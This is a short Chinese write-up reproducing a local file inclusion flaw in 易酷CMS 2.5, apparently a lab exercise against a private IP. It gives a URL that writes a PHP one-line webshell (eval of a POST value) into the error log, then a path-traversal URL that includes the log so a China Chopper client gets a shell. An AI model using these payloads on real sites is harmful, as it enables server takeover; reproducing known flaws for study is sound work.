易酷CMS2.5本地文件包含漏洞复现

易酷CMS是一款影片播放CMS。该CMS2.5版本存在本地文件包含漏洞。我们可以利用这个漏洞，让其包含日志文件，然后再利用报错信息将一句话木马写入日志中。然后利用文件包含漏洞包含该日志文件，再用菜刀连接拿shell。

渗透之前的操作，比如先用后台扫描工具，扫描得到该网站的后台目录结构，才更好的进行后面的操作。

我们通过访问该url，将一句话木马写入日志文件中

http://192.168.10.22/index.php?s=my/show/id/{~eval($_POST[x])}

该日志是以时间日期命名的，用菜刀连接该日志文件，得到shell

http://192.168.10.22/index.php?s=my/show/id/\..\temp\logs\18_11_28.log

相关文章：文件包含漏洞

                  一句话木马提权